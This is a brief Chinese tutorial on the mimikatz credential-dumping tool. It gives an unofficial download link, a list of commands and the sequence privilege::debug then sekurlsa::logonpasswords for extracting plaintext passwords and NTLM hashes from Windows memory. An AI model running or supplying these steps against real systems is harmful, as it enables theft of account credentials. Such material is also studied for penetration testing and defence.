0X00工具简介:
mimikatz是一款windows平台下的神器,它具备很多功能,其中最亮的功能是直接从lsass.exe进程里获取windows处于active状态账号以及明文密码。mimikatz的功能不仅如此,它还可以提升进程权限,注入进程,读取进程内存等。
0X01工具下载:
下载地址:(链接:https://pan.baidu.com/s/189BtUTGEGLyUfcas5pMhHg 提取码:zwj9)
下载解压后双击.exe即可运行。
0X02基础命令:
cls 清屏 exit 退出 version 查看版本 help 查看帮助 system::user 查看当前登录的系统用户 system::computer 查看计算机名称 process::list 列出进程 privilege::debug 提升权限 sekurlsa::logonpasswords 获取登录用户信息以及明文密码
0X03使用效果:
首先提权
privilege::debug
获取本机用户名、密码、sid、LM hash、NTML hash等。
sekurlsa::logonpasswords
